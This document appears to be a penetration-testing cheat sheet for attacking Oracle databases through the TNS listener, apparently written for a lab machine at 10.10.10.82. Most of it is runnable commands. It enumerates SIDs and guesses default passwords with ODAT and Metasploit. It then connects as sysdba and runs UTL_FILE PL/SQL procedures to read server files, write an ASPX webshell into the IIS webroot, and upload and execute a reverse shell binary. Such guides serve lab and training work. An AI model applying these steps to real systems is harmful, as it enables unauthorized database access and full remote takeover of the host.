sudo alien --to-deb *.rpm
sudo dpkg -i *.deb
#Add this to /etc/profile
#To add ORACLE_HOME path. There are 2 directories. Add the 19.x directory to path
#ls /usr/lib/oracle
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
pip install cx_Oracle
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap
Enumeration
#Enumerate SID [Oracle System ID for DB / String used to uniquely identify a particular database on a system.]
python3 odat.py sidguesser -s <IP> -p 1521
use auxiliary/scanner/oracle/sid_brute
#Check TNS_Listener poisoning
use auxiliary/scanner/oracle/tnspoison_checker
#Identify valid accounts with ODAT
#Wordlist: /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt ./accounts/accounts.txt
#Change the formatting to match <user/pass> using SED formatting:
%s/ /\//g
python3 odat.py passwordguesser -s <IP> -d <SID>
##Connect to DB with valid credentials
sqlplus64 scott/tiger@10.10.10.82/<SID> as sysdba
#List session privileges
select * from session_privs;
#List role privileges
select * from user_role_privs;
Exploitation
Requires Valid Credentials
Check Read Access
When writing a file to server within login shell, Hit / to execute.
sqlplus64 scott/tiger@10.10.10.82/XE as sysdba
set serveroutput ON
#Run stored procedure. Hit `/` to execute.
declare
f utl_file.file_type;
s varchar(200);
begin
f :=utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
Webshell
Web shell runs with IIS service privileges.
Upload webshell to webroot and access via web server.
#Automate using odat
#Set up an ASPX reverse shell & listener
python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" <name-on-target>.aspx <path-to-shell-local> --sysdba
-----------
#Manual upload webshell. Remove extra lines/comments. Line count needs to be <1000 for Oracle to execute
cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx
sed -z 's/\n//g' shell.aspx
#Save the below stored procedure.
declare
f utl_file.file_type;
s varchar(5000) := '<Replace with .aspx webshell code>';
begin
f :=utl_file.fopen('/inetpub/wwwroot', 'cmd.aspx','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
Reverse Shell
May be unstable
Runs with Oracle service privileges
#Set up reverse shell and listener
python odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /<Target-location> <uploadedshell.exe> <path-to-shell-local --sysdba
./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec </temp: Target-location> <uploadedshell.exe>
----------------------------
#Manual upload
declare
f utl_file.file_type;
s varchar(5000) := '<Replace with shellcode>';
begin
f :=utl_file.fopen('/inetpub/wwwroot', 'revshell.exe','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;